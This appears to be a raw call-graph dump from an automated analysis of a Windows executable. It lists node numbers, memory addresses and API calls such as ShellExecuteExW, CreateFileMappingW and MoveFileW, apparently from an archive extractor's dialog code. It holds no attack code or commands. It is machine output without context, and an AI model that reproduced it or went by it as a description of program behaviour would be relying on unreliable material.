25654 7ff6c037b80b 26118 7ff6c037aad4 33 API calls _handle_error 25654->26118 26034 7ff6c037f8f4 25656->26034 25668 7ff6c036aaa0 48 API calls 25657->25668 25662 7ff6c037c4fb 25658->25662 25755 7ff6c037c984 25658->25755 25672 7ff6c036aaa0 48 API calls 25662->25672 25663 7ff6c037b81c 26119 7ff6c036b970 102 API calls 25663->26119 25667 7ff6c037ce08 160 API calls 25683 7ff6c037bbea 25667->25683 25671 7ff6c037ba5b 25668->25671 25669 7ff6c037b833 26120 7ff6c037fb5c 33 API calls 25669->26120 25670 7ff6c037ca01 25670->25591 25684 7ff6c035129c 33 API calls 25671->25684 25677 7ff6c037c51e 25672->25677 25674 7ff6c037ca29 25675 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25674->25675 25679 7ff6c037ca2e 25675->25679 25676 7ff6c037bc16 26046 7ff6c0352298 GetDlgItem EnableWindow 25676->26046 25688 7ff6c035129c 33 API calls 25677->25688 25678 7ff6c037b852 CreateFileMappingW 25681 7ff6c037b8d3 ShellExecuteExW 25678->25681 25682 7ff6c037b891 MapViewOfFile 25678->25682 25686 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25679->25686 25701 7ff6c037b8f4 25681->25701 26121 7ff6c03835c0 25682->26121 25683->25676 25687 7ff6c037ce08 160 API calls 25683->25687 25694 7ff6c037ba84 25684->25694 25689 7ff6c037ca34 25686->25689 25687->25676 25690 7ff6c037c54d 25688->25690 25693 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25689->25693 25691 7ff6c0351150 33 API calls 25690->25691 25696 7ff6c037c568 25691->25696 25692 7ff6c037b943 25702 7ff6c037b95c UnmapViewOfFile CloseHandle 25692->25702 25703 7ff6c037b96f 25692->25703 25697 7ff6c037ca3a 25693->25697 25694->25542 25695 7ff6c037bada 25694->25695 25698 7ff6c0351fa0 31 API calls 25695->25698 26147 7ff6c035e174 33 API calls 2 library calls 25696->26147 25706 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25697->25706 25698->25588 25700 7ff6c037c57f 25704 7ff6c0351fa0 31 API calls 25700->25704 25701->25692 25708 7ff6c037b931 Sleep 25701->25708 25702->25703 25703->25517 25705 7ff6c037b9a5 25703->25705 25707 7ff6c037c58c 25704->25707 25710 7ff6c0351fa0 31 API calls 25705->25710 25709 7ff6c037ca40 25706->25709 25707->25679 25712 7ff6c0351fa0 31 API calls 25707->25712 25708->25692 25708->25701 25713 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25709->25713 25711 7ff6c037b9c2 25710->25711 25714 7ff6c0351fa0 31 API calls 25711->25714 25715 7ff6c037c5f3 25712->25715 25716 7ff6c037ca46 25713->25716 25714->25581 25717 7ff6c035250c SetDlgItemTextW 25715->25717 25719 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25716->25719 25718 7ff6c037c607 FindClose 25717->25718 25720 7ff6c037c717 SendDlgItemMessageW 25718->25720 25721 7ff6c037c623 25718->25721 25722 7ff6c037ca4c 25719->25722 25723 7ff6c037c74b 25720->25723 26148 7ff6c037a24c 10 API calls _handle_error 25721->26148 25726 7ff6c036aaa0 48 API calls 25723->25726 25725 7ff6c037c646 25727 7ff6c036aaa0 48 API calls 25725->25727 25728 7ff6c037c758 25726->25728 25729 7ff6c037c64f 25727->25729 25731 7ff6c035129c 33 API calls 25728->25731 25730 7ff6c036da14 48 API calls 25729->25730 25735 7ff6c037c66c memcpy_s 25730->25735 25732 7ff6c037c787 25731->25732 25734 7ff6c0351150 33 API calls 25732->25734 25733 7ff6c0351fa0 31 API calls 25736 7ff6c037c703 25733->25736 25737 7ff6c037c7a2 25734->25737 25735->25689 25735->25733 25738 7ff6c035250c SetDlgItemTextW 25736->25738 26149 7ff6c035e174 33 API calls 2 library calls 25737->26149 25738->25720 25740 7ff6c037c7b9 25741 7ff6c0351fa0 31 API calls 25740->25741 25742 7ff6c037c7c5 memcpy_s 25741->25742 25743 7ff6c0351fa0 31 API calls 25742->25743 25744 7ff6c037c7ff 25743->25744 25745 7ff6c0351fa0 31 API calls 25744->25745 25746 7ff6c037c80c 25745->25746 25746->25697 25747 7ff6c0351fa0 31 API calls 25746->25747 25748 7ff6c037c873 25747->25748 25749 7ff6c035250c SetDlgItemTextW 25748->25749 25750 7ff6c037c887 25749->25750 25750->25755 26150 7ff6c037a24c 10 API calls _handle_error 25750->26150 25752 7ff6c037c8b2 25753 7ff6c036aaa0 48 API calls 25752->25753 25754 7ff6c037c8bc 25753->25754 25756 7ff6c036da14 48 API calls 25754->25756 25755->25591 25755->25670 25755->25674 25755->25716 25758 7ff6c037c8d9 memcpy_s 25756->25758 25757 7ff6c0351fa0 31 API calls 25759 7ff6c037c970 25757->25759 25758->25709 25758->25757 25760 7ff6c035250c SetDlgItemTextW 25759->25760 25760->25755 25762 7ff6c035256a 25761->25762 25763 7ff6c03525d0 25761->25763 25762->25763 26151 7ff6c036a46c 25762->26151 25763->25420 25765 7ff6c035258f 25765->25763 25766 7ff6c03525a4 GetDlgItem 25765->25766 25766->25763 25767 7ff6c03525b7 25766->25767 25767->25763 25768 7ff6c03525be SetWindowTextW 25767->25768 25768->25763 25770 7ff6c03522fc 25769->25770 25771 7ff6c0352334 25769->25771 25773 7ff6c035129c 33 API calls 25770->25773 26250 7ff6c03523f8 GetWindowTextLengthW 25771->26250 25774 7ff6c035232a memcpy_s 25773->25774 25775 7ff6c0351fa0 31 API calls 25774->25775 25776 7ff6c0352389 25774->25776 25775->25776 25778 7ff6c03523c8 25776->25778 25780 7ff6c03523f0 25776->25780 25777 7ff6c03822a0 _handle_error 8 API calls 25779 7ff6c03523dd 25777->25779 25778->25777 25779->25448 25779->25449 25779->25588 25781 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25780->25781 25782 7ff6c03523f5 25781->25782 25784 7ff6c0358d34 25783->25784 25791 7ff6c0358de8 25783->25791 25787 7ff6c0358de3 25784->25787 25789 7ff6c0358d42 memcpy_s 25784->25789 25790 7ff6c0358d91 25784->25790 26294 7ff6c0351f80 33 API calls 3 library calls 25787->26294 25789->25471 25790->25789 25792 7ff6c0382150 33 API calls 25790->25792 26295 7ff6c0352004 33 API calls std::_Xinvalid_argument 25791->26295 25792->25789 25797 7ff6c037ef30 25793->25797 25794 7ff6c037ef57 25795 7ff6c03822a0 _handle_error 8 API calls 25794->25795 25796 7ff6c037b4b7 25795->25796 25807 7ff6c036aaa0 25796->25807 25797->25794 26296 7ff6c035bd1c 33 API calls 25797->26296 25799 7ff6c037efaa 25800 7ff6c0351150 33 API calls 25799->25800 25801 7ff6c037efbf 25800->25801 25802 7ff6c0351fa0 31 API calls 25801->25802 25804 7ff6c037efcf memcpy_s 25801->25804 25802->25804 25803 7ff6c0351fa0 31 API calls 25805 7ff6c037eff6 25803->25805 25804->25803 25806 7ff6c0351fa0 31 API calls 25805->25806 25806->25794 25808 7ff6c036aab3 25807->25808 26297 7ff6c0369734 25808->26297 25811 7ff6c036ab18 LoadStringW 25812 7ff6c036ab46 25811->25812 25813 7ff6c036ab31 LoadStringW 25811->25813 25814 7ff6c036da14 25812->25814 25813->25812 26316 7ff6c036d7f0 25814->26316 25817 7ff6c037f024 26350 7ff6c037ad9c PeekMessageW 25817->26350 25820 7ff6c037f075 25826 7ff6c037f081 ShowWindow SendMessageW SendMessageW 25820->25826 25821 7ff6c037f0c3 SendMessageW SendMessageW 25822 7ff6c037f109 25821->25822 25823 7ff6c037f124 SendMessageW 25821->25823 25822->25823 25824 7ff6c037f146 SendMessageW SendMessageW 25823->25824 25825 7ff6c037f143 25823->25825 25827 7ff6c037f198 SendMessageW 25824->25827 25828 7ff6c037f173 SendMessageW 25824->25828 25825->25824 25826->25821 25829 7ff6c03822a0 _handle_error 8 API calls 25827->25829 25828->25827 25830 7ff6c037b4f8 25829->25830 25830->25521 25832 7ff6c0363063 25831->25832 25836 7ff6c0362f4e 25831->25836 25833 7ff6c03822a0 _handle_error 8 API calls 25832->25833 25834 7ff6c0363073 25833->25834 25834->25547 25834->25548 25835 7ff6c0363037 25835->25832 25837 7ff6c0363050 25835->25837 25836->25835 25842 7ff6c0362fc9 25836->25842 26356 7ff6c0363644 56 API calls 2 library calls 25837->26356 25839 7ff6c035129c 33 API calls 25839->25842 25840 7ff6c036305d 25840->25832 25842->25836 25842->25839 25843 7ff6c0363088 25842->25843 26355 7ff6c0363644 56 API calls 2 library calls 25842->26355 25844 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25843->25844 25845 7ff6c036308d 25844->25845 25847 7ff6c0367f92 SetCurrentDirectoryW 25846->25847 25848 7ff6c0367f8f 25846->25848 25847->25564 25848->25847 25850 7ff6c0354255 25849->25850 25851 7ff6c035426a 25850->25851 25852 7ff6c035129c 33 API calls 25850->25852 25853 7ff6c03822a0 _handle_error 8 API calls 25851->25853 25852->25851 25854 7ff6c03542a1 25853->25854 25855 7ff6c0353c84 25854->25855 25856 7ff6c0353cab 25855->25856 26357 7ff6c035710c 25856->26357 25858 7ff6c0353cbb memcpy_s 25858->25605 25860 7ff6c0351fb3 25859->25860 25861 7ff6c0351fdc 25859->25861 25860->25861 25862 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25860->25862 25861->25618 25863 7ff6c0352000 25862->25863 25866 7ff6c036212a 25864->25866 25865 7ff6c036215e 25876 7ff6c036223f 25865->25876 26369 7ff6c03669cc 25865->26369 25866->25865 25867 7ff6c0362171 CreateFileW 25866->25867 25867->25865 25868 7ff6c036226f 25870 7ff6c03822a0 _handle_error 8 API calls 25868->25870 25873 7ff6c0362284 25870->25873 25872 7ff6c03520b0 33 API calls 25872->25868 25873->25648 25873->25649 25874 7ff6c03621cd CreateFileW 25875 7ff6c0362206 25874->25875 25875->25876 25877 7ff6c0362298 25875->25877 25876->25868 25876->25872 25878 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25877->25878 25879 7ff6c036229d 25878->25879 25881 7ff6c036201e 25880->25881 25882 7ff6c036202a 25880->25882 25881->25882 26454 7ff6c0362090 25881->26454 26461 7ff6c037a988 25884->26461 25886 7ff6c037d16e 25887 7ff6c0351fa0 31 API calls 25886->25887 25888 7ff6c037d177 25887->25888 25889 7ff6c03822a0 _handle_error 8 API calls 25888->25889 25891 7ff6c037bbab 25889->25891 25890 7ff6c036d1e8 33 API calls 25898 7ff6c037ce83 memcpy_s 25890->25898 25891->25652 25892 7ff6c037ee7a 26608 7ff6c035704c 47 API calls memcpy_s 25892->26608 25895 7ff6c037ee80 26609 7ff6c035704c 47 API calls memcpy_s 25895->26609 25896 7ff6c035129c 33 API calls 25896->25898 25898->25886 25898->25890 25898->25892 25898->25895 25898->25896 25899 7ff6c037ee86 25898->25899 25902 7ff6c037ee74 25898->25902 25904 7ff6c037ee8c 25898->25904 25908 7ff6c037ee92 25898->25908 25909 7ff6c03513a4 33 API calls 25898->25909 25915 7ff6c037ee98 25898->25915 25916 7ff6c036629c 35 API calls 25898->25916 25918 7ff6c037ee6e 25898->25918 25923 7ff6c0352520 SetWindowTextW 25898->25923 25928 7ff6c037e773 25898->25928 25929 7ff6c038bb0c 43 API calls 25898->25929 25930 7ff6c037ee9e 25898->25930 25936 7ff6c037a988 33 API calls 25898->25936 25937 7ff6c037eea4 25898->25937 25939 7ff6c0352034 33 API calls 25898->25939 25948 7ff6c037edca 25898->25948 25949 7ff6c037eeaa 25898->25949 25954 7ff6c03657e0 33 API calls 25898->25954 25962 7ff6c037eeb0 25898->25962 25968 7ff6c036dba8 33 API calls 25898->25968 25980 7ff6c037eeb6 25898->25980 25983 7ff6c0352674 31 API calls 25898->25983 25984 7ff6c0365b20 53 API calls 25898->25984 25986 7ff6c037d5bc SendMessageW 25898->25986 25987 7ff6c037eebc 25898->25987 25992 7ff6c0363ef0 54 API calls 25898->25992 25997 7ff6c0351fa0 31 API calls 25898->25997 25998 7ff6c037eec2 25898->25998 26001 7ff6c0358d04 33 API calls 25898->26001 26002 7ff6c0354228 33 API calls 25898->26002 26006 7ff6c0363268 51 API calls 25898->26006 26008 7ff6c0365a68 33 API calls 25898->26008 26009 7ff6c035e174 33 API calls 25898->26009 26011 7ff6c035250c SetDlgItemTextW 25898->26011 26014 7ff6c0351150 33 API calls 25898->26014 26018 7ff6c0379948 31 API calls 25898->26018 26022 7ff6c037df19 EndDialog 25898->26022 26024 7ff6c036327c 51 API calls 25898->26024 26027 7ff6c037daa1 MoveFileW 25898->26027 26031 7ff6c03520b0 33 API calls 25898->26031 26032 7ff6c0362f18 56 API calls 25898->26032 26465 7ff6c0371344 CompareStringW 25898->26465 26466 7ff6c037a3c0 25898->26466 26542 7ff6c036cf60 35 API calls _invalid_parameter_noinfo_noreturn 25898->26542 26543 7ff6c0379534 33 API calls Concurrency::cancel_current_task 25898->26543 26544 7ff6c0380604 31 API calls _invalid_parameter_noinfo_noreturn 25898->26544 26545 7ff6c035df5c 47 API calls memcpy_s 25898->26545 26546 7ff6c037a7b4 33 API calls _invalid_parameter_noinfo_noreturn 25898->26546 26547 7ff6c0379498 33 API calls 25898->26547 26548 7ff6c037ab68 33 API calls 3 library calls 25898->26548 26549 7ff6c0367328 33 API calls 2 library calls 25898->26549 26550 7ff6c0364048 33 API calls 25898->26550 26551 7ff6c0363cf4 25898->26551 26565 7ff6c0366570 33 API calls 3 library calls 25898->26565 26566 7ff6c036728c 25898->26566 26570 7ff6c0351744 33 API calls 4 library calls 25898->26570 26571 7ff6c036317c 25898->26571 26585 7ff6c0363e60 FindClose 25898->26585 26586 7ff6c0371374 CompareStringW 25898->26586 26587 7ff6c0379c50 47 API calls 25898->26587 26588 7ff6c0378758 51 API calls 3 library calls 25898->26588 26589 7ff6c037aad4 33 API calls _handle_error 25898->26589 26590 7ff6c0367db4 25898->26590 26598 7ff6c0365ac8 CompareStringW 25898->26598 26599 7ff6c0367e70 47 API calls 25898->26599 25903 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25899->25903 25901 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25901->25902 26607 7ff6c035704c 47 API calls memcpy_s 25902->26607 25903->25904 25907 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25904->25907 25907->25908 25910 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25908->25910 25914 7ff6c037dbba GetTempPathW 25909->25914 25910->25915 25911 7ff6c03520b0 33 API calls 25913 7ff6c037edf7 25911->25913 26604 7ff6c037ab68 33 API calls 3 library calls 25913->26604 25914->25898 25924 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25915->25924 25916->25898 25917 7ff6c037ee52 26605 7ff6c0351f80 33 API calls 3 library calls 25917->26605 25918->25901 25922 7ff6c037ee0d 25931 7ff6c0351fa0 31 API calls 25922->25931 25934 7ff6c037ee24 memcpy_s 25922->25934 25923->25898 25924->25930 25926 7ff6c037ee68 26606 7ff6c0352004 33 API calls std::_Xinvalid_argument 25926->26606 25928->25917 25928->25926 25933 7ff6c0382150 33 API calls 25928->25933 25945 7ff6c037e7bb memcpy_s 25928->25945 25929->25898 25935 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25930->25935 25931->25934 25932 7ff6c0351fa0 31 API calls 25932->25917 25933->25945 25934->25932 25935->25937 25936->25898 25944 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25937->25944 25939->25898 25940 7ff6c037eeec 26612 7ff6c0352004 33 API calls std::_Xinvalid_argument 25940->26612 25942 7ff6c0351fa0 31 API calls 25942->25948 25943 7ff6c037eef8 26614 7ff6c0352004 33 API calls std::_Xinvalid_argument 25943->26614 25944->25949 25951 7ff6c03520b0 33 API calls 25945->25951 25988 7ff6c037eb0f 25945->25988 25946 7ff6c037eef2 26613 7ff6c0351f80 33 API calls 3 library calls 25946->26613 25948->25911 25948->25917 25956 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25949->25956 25950 7ff6c037eee6 26611 7ff6c0351f80 33 API calls 3 library calls 25950->26611 25957 7ff6c037e8e3 25951->25957 25954->25898 25955 7ff6c037ebaa 25955->25940 25955->25950 25965 7ff6c037ebf2 memcpy_s 25955->25965 25971 7ff6c0382150 33 API calls 25955->25971 25975 7ff6c037ecbb memcpy_s 25955->25975 25956->25962 25964 7ff6c037eee0 25957->25964 25970 7ff6c035129c 33 API calls 25957->25970 25960 7ff6c037ecc0 25960->25943 25960->25946 25960->25975 25979 7ff6c0382150 33 API calls 25960->25979 25976 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25962->25976 26610 7ff6c035704c 47 API calls memcpy_s 25964->26610 26504 7ff6c037f460 25965->26504 25967 7ff6c037d569 GetDlgItem 25972 7ff6c0352520 SetWindowTextW 25967->25972 25968->25898 25977 7ff6c037e926 25970->25977 25971->25965 25978 7ff6c037d588 SendMessageW 25972->25978 25975->25942 25976->25980 26600 7ff6c036d1e8 25977->26600 25978->25898 25979->25975 25985 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25980->25985 25983->25898 25984->25898 25985->25987 25986->25898 25993 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25987->25993 25988->25955 25988->25960 25996 7ff6c037eed4 25988->25996 25999 7ff6c037eeda 25988->25999 25992->25898 25993->25998 25995 7ff6c035129c 33 API calls 26025 7ff6c037e951 25995->26025 26000 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25996->26000 25997->25898 26005 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25998->26005 26004 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 25999->26004 26000->25999 26001->25898 26002->25898 26004->25964 26007 7ff6c037eec8 26005->26007 26006->25898 26010 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26007->26010 26008->25898 26009->25898 26012 7ff6c037eece 26010->26012 26011->25898 26016 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26012->26016 26014->25898 26016->25996 26018->25898 26019 7ff6c0351fa0 31 API calls 26019->26025 26021 7ff6c0371344 CompareStringW 26021->26025 26022->25898 26024->25898 26025->25988 26025->25995 26025->26007 26025->26012 26025->26019 26025->26021 26026 7ff6c036d1e8 33 API calls 26025->26026 26026->26025 26028 7ff6c037dad5 MoveFileExW 26027->26028 26029 7ff6c037daf0 26027->26029 26028->26029 26029->25898 26030 7ff6c0351fa0 31 API calls 26029->26030 26030->26029 26031->25898 26032->25898 26035 7ff6c037f923 26034->26035 26036 7ff6c03520b0 33 API calls 26035->26036 26037 7ff6c037f939 26036->26037 26038 7ff6c037f96e 26037->26038 26039 7ff6c03520b0 33 API calls 26037->26039 26646 7ff6c035e35c 26038->26646 26039->26038 26041 7ff6c037f9cb 26666 7ff6c035e7b8 26041->26666 26043 7ff6c037f9d6 26044 7ff6c03822a0 _handle_error 8 API calls 26043->26044 26045 7ff6c037bbd2 26044->26045 26045->25667 27713 7ff6c037841c 26047->27713 26050 7ff6c037f437 26053 7ff6c03822a0 _handle_error 8 API calls 26050->26053 26051 7ff6c037f347 GetWindow 26052 7ff6c037f362 26051->26052 26052->26050 26055 7ff6c037f36e GetClassNameW 26052->26055 26057 7ff6c037f397 GetWindowLongPtrW 26052->26057 26058 7ff6c037f416 GetWindow 26052->26058 26054 7ff6c037be1b 26053->26054 26054->25432 26054->25433 27718 7ff6c0371344 CompareStringW 26055->27718 26057->26058 26059 7ff6c037f3a9 SendMessageW 26057->26059 26058->26050 26058->26052 26059->26058 26060 7ff6c037f3c5 GetObjectW 26059->26060 27719 7ff6c0378484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26060->27719 26062 7ff6c037f3e1 27720 7ff6c037844c 26062->27720 27724 7ff6c0378d74 16 API calls _handle_error 26062->27724 26065 7ff6c037f3f9 SendMessageW DeleteObject 26065->26058 26067 7ff6c036634d 26066->26067 26068 7ff6c03662c0 26066->26068 26067->25443 26069 7ff6c03513a4 33 API calls 26068->26069 26070 7ff6c03662db GetCurrentDirectoryW 26069->26070 26071 7ff6c0366301 26070->26071 26072 7ff6c03520b0 33 API calls 26071->26072 26073 7ff6c036630f 26072->26073 26073->26067 26074 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26073->26074 26075 7ff6c0366369 26074->26075 26077 7ff6c035252a SetWindowTextW 26076->26077 26078 7ff6c0352527 26076->26078 26079 7ff6c03be2e0 26077->26079 26078->26077 26080->25453 26082 7ff6c0352516 SetDlgItemTextW 26081->26082 26083 7ff6c0352513 26081->26083 26083->26082 26085 7ff6c035139b 26084->26085 26086 7ff6c03512d0 26084->26086 27728 7ff6c0352004 33 API calls std::_Xinvalid_argument 26085->27728 26089 7ff6c0351396 26086->26089 26090 7ff6c0351338 26086->26090 26091 7ff6c03512de memcpy_s 26086->26091 27727 7ff6c0351f80 33 API calls 3 library calls 26089->27727 26090->26091 26093 7ff6c0382150 33 API calls 26090->26093 26091->25489 26093->26091 26094->25524 26096 7ff6c036327c 51 API calls 26095->26096 26097 7ff6c0363271 26096->26097 26097->25534 26097->25552 26098->25534 26100 7ff6c03513a4 33 API calls 26099->26100 26101 7ff6c0366449 26100->26101 26102 7ff6c036644c GetModuleFileNameW 26101->26102 26104 7ff6c036649c 26101->26104 26103 7ff6c036649e 26102->26103 26105 7ff6c0366467 26102->26105 26103->26104 26106 7ff6c035129c 33 API calls 26104->26106 26105->26101 26108 7ff6c03664c6 26106->26108 26107 7ff6c03664fe 26107->25594 26108->26107 26109 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26108->26109 26110 7ff6c0366520 26109->26110 26111->25610 26113 7ff6c03520f6 26112->26113 26115 7ff6c03520cb memcpy_s 26112->26115 27729 7ff6c0351474 33 API calls 3 library calls 26113->27729 26115->25628 26116->25640 26117->25654 26118->25663 26119->25669 26120->25678 26122 7ff6c03835a0 26121->26122 26122->25681 26123->25598 26125 7ff6c0351177 26124->26125 26126 7ff6c0352034 33 API calls 26125->26126 26127 7ff6c0351185 memcpy_s 26126->26127 26127->25613 26129 7ff6c0352085 26128->26129 26131 7ff6c0352059 memcpy_s 26128->26131 27730 7ff6c03515b8 33 API calls 3 library calls 26129->27730 26131->25582 26133 7ff6c03822a9 26132->26133 26134 7ff6c037c2d0 26133->26134 26135 7ff6c03824d0 IsProcessorFeaturePresent 26133->26135 26136 7ff6c03824e8 26135->26136 27731 7ff6c03826c4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26136->27731 26138 7ff6c03824fb 27732 7ff6c0382490 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26138->27732 27733 7ff6c03877bc 31 API calls 3 library calls 26141->27733 26143 7ff6c038789d 27734 7ff6c03878b4 16 API calls abort 26143->27734 26146->25633 26147->25700 26148->25725 26149->25740 26150->25752 26176 7ff6c0363de8 26151->26176 26155 7ff6c036a549 26182 7ff6c03693c8 26155->26182 26156 7ff6c036a4d9 26156->26155 26173 7ff6c036a52a SetDlgItemTextW 26156->26173 26197 7ff6c03697c0 26156->26197 26159 7ff6c036a6b2 GetSystemMetrics GetWindow 26163 7ff6c036a7e1 26159->26163 26174 7ff6c036a6dd 26159->26174 26160 7ff6c036a5c3 26161 7ff6c036a5cc GetWindowLongPtrW 26160->26161 26162 7ff6c036a682 26160->26162 26165 7ff6c03be2c0 26161->26165 26201 7ff6c0369568 26162->26201 26164 7ff6c03822a0 _handle_error 8 API calls 26163->26164 26167 7ff6c036a7f0 26164->26167 26168 7ff6c036a66a GetWindowRect 26165->26168 26167->25765 26168->26162 26171 7ff6c036a6fe GetWindowRect 26171->26174 26172 7ff6c036a6a5 SetWindowTextW 26172->26159 26173->26156 26174->26163 26174->26171 26175 7ff6c036a7c0 GetWindow 26174->26175 26175->26163 26175->26174 26177 7ff6c0363e0d swprintf 26176->26177 26210 7ff6c0389e70 26177->26210 26180 7ff6c0370ee8 WideCharToMultiByte 26181 7ff6c0370f2a 26180->26181 26181->26156 26183 7ff6c0369568 47 API calls 26182->26183 26187 7ff6c036940f 26183->26187 26184 7ff6c036951a 26185 7ff6c03822a0 _handle_error 8 API calls 26184->26185 26186 7ff6c036954e GetWindowRect GetClientRect 26185->26186 26186->26159 26186->26160 26187->26184 26188 7ff6c035129c 33 API calls 26187->26188 26189 7ff6c036945c 26188->26189 26190 7ff6c0369561 26189->26190 26191 7ff6c035129c 33 API calls 26189->26191 26192 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26190->26192 26194 7ff6c03694d4 26191->26194 26193 7ff6c0369567 26192->26193 26194->26184 26195 7ff6c036955c 26194->26195 26196 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26195->26196 26196->26190 26198 7ff6c0369800 26197->26198 26200 7ff6c0369829 26197->26200 26249 7ff6c038a1f0 31 API calls 2 library calls 26198->26249 26200->26156 26202 7ff6c0363de8 swprintf 46 API calls 26201->26202 26203 7ff6c03695ab 26202->26203 26204 7ff6c0370ee8 WideCharToMultiByte 26203->26204 26205 7ff6c03695c3 26204->26205 26206 7ff6c03697c0 31 API calls 26205->26206 26207 7ff6c03695db 26206->26207 26208 7ff6c03822a0 _handle_error 8 API calls 26207->26208 26209 7ff6c03695eb 26208->26209 26209->26159 26209->26172 26211 7ff6c0389ece 26210->26211 26212 7ff6c0389eb6 26210->26212 26211->26212 26214 7ff6c0389ed8 26211->26214 26237 7ff6c038d61c 15 API calls abort 26212->26237 26239 7ff6c0387e70 35 API calls 2 library calls 26214->26239 26215 7ff6c0389ebb 26238 7ff6c0387864 31 API calls _invalid_parameter_noinfo 26215->26238 26218 7ff6c03822a0 _handle_error 8 API calls 26220 7ff6c0363e29 26218->26220 26219 7ff6c0389ee9 __scrt_get_show_window_mode 26240 7ff6c0387df0 15 API calls memcpy_s 26219->26240 26220->26180 26222 7ff6c0389f54 26241 7ff6c0388278 46 API calls 3 library calls 26222->26241 26224 7ff6c0389f5d 26225 7ff6c0389f94 26224->26225 26226 7ff6c0389f65 26224->26226 26228 7ff6c0389fec 26225->26228 26229 7ff6c038a012 26225->26229 26230 7ff6c0389fa3 26225->26230 26231 7ff6c0389f9a 26225->26231 26242 7ff6c038d88c 26226->26242 26232 7ff6c038d88c __free_lconv_num 15 API calls 26228->26232 26229->26228 26233 7ff6c038a01c 26229->26233 26234 7ff6c038d88c __free_lconv_num 15 API calls 26230->26234 26231->26228 26231->26230 26236 7ff6c0389ec6 26232->26236 26235 7ff6c038d88c __free_lconv_num 15 API calls 26233->26235 26234->26236 26235->26236 26236->26218 26237->26215 26238->26236 26239->26219 26240->26222 26241->26224 26243 7ff6c038d891 RtlFreeHeap 26242->26243 26247 7ff6c038d8c1 __free_lconv_num 26242->26247 26244 7ff6c038d8ac 26243->26244 26243->26247 26248 7ff6c038d61c 15 API calls abort 26244->26248 26246 7ff6c038d8b1 GetLastError 26246->26247 26247->26236 26248->26246 26249->26200 26262 7ff6c03513a4 26250->26262 26253 7ff6c0352494 26254 7ff6c035129c 33 API calls 26253->26254 26255 7ff6c03524a2 26254->26255 26256 7ff6c03524dd 26255->26256 26258 7ff6c0352505 26255->26258 26257 7ff6c03822a0 _handle_error 8 API calls 26256->26257 26259 7ff6c03524f3 26257->26259 26260 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26258->26260 26259->25774 26261 7ff6c035250a 26260->26261 26263 7ff6c03513ad 26262->26263 26271 7ff6c035142d GetWindowTextW 26262->26271 26264 7ff6c035143d 26263->26264 26266 7ff6c03513ce 26263->26266 26282 7ff6c0352018 33 API calls std::_Xinvalid_argument 26264->26282 26268 7ff6c03513db __scrt_get_show_window_mode 26266->26268 26272 7ff6c0382150 26266->26272 26281 7ff6c035197c 31 API calls _invalid_parameter_noinfo_noreturn 26268->26281 26271->26253 26276 7ff6c038215b 26272->26276 26273 7ff6c0382174 26273->26268 26275 7ff6c038217a 26277 7ff6c0382185 26275->26277 26286 7ff6c0382efc RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26275->26286 26276->26273 26276->26275 26283 7ff6c038bb40 26276->26283 26287 7ff6c0351f80 33 API calls 3 library calls 26277->26287 26280 7ff6c038218b 26281->26271 26288 7ff6c038bb80 26283->26288 26286->26277 26287->26280 26293 7ff6c038f318 EnterCriticalSection 26288->26293 26294->25791 26296->25799 26304 7ff6c03695f8 26297->26304 26300 7ff6c0369799 26302 7ff6c03822a0 _handle_error 8 API calls 26300->26302 26301 7ff6c03697c0 31 API calls 26301->26300 26303 7ff6c03697b2 26302->26303 26303->25811 26303->25812 26305 7ff6c0369652 26304->26305 26306 7ff6c03696f0 26304->26306 26307 7ff6c0370ee8 WideCharToMultiByte 26305->26307 26311 7ff6c0369680 26305->26311 26309 7ff6c03822a0 _handle_error 8 API calls 26306->26309 26307->26311 26308 7ff6c03696af 26315 7ff6c038a1f0 31 API calls 2 library calls 26308->26315 26310 7ff6c0369724 26309->26310 26310->26300 26310->26301 26311->26308 26314 7ff6c036aa48 45 API calls 2 library calls 26311->26314 26314->26308 26315->26306 26332 7ff6c036d44c 26316->26332 26320 7ff6c0389e70 swprintf 46 API calls 26322 7ff6c036d861 swprintf 26320->26322 26321 7ff6c036d91f 26324 7ff6c036d993 26321->26324 26326 7ff6c036d9bb 26321->26326 26322->26320 26329 7ff6c036d8f0 26322->26329 26346 7ff6c0359d78 33 API calls 26322->26346 26325 7ff6c03822a0 _handle_error 8 API calls 26324->26325 26327 7ff6c036d9a7 26325->26327 26328 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26326->26328 26327->25817 26330 7ff6c036d9c0 